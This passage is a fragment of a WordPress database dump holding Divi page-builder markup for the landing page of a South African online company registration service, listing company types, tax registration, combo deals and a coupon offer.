chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"29px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" _builder_version=\"3.26.6\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" custom_margin=\"|||\" custom_padding=\"0|15px|0px|14px|false|false\"][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background__hover_enabled=\"on\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||0px|||\" custom_padding=\"10px|5px|52px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#0c71c3\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.26.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"rgba(0,0,0,0.39)\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\" custom_margin=\"-12px||-13px|||\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"rgba(0,0,0,0.39)\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" custom_margin=\"-23px|||||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.26.6\" background_color=\"#eb007e\" border_radii=\"on|15px|15px|15px|15px\" custom_padding=\"|||\" custom_padding__hover=\"|||\" background_color__hover=\"rgba(0,0,0,0)\" background_enable_color__hover=\"on\" background__hover_enabled=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#000000\" body_text_color=\"#eb007e\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"||-6px|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#0c71c3\" header_text_color__hover_enabled=\"on\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"rgba(0,0,0,0.39)\" button_bg_color=\"#ea008c\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_bg_color__hover=\"#eaeaea\" button_bg_enable_color__hover=\"on\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"28px|0px|4px|0px\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"30px|0px|14px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"||20px|\" custom_padding=\"20px|20px||20px\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0|0px|12px|0px|false|false\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|38px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-08 10:55:42','2019-08-08 08:55:42','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(32399,3,'2019-08-08 10:52:55','2019-08-08 08:52:55','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|48px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" 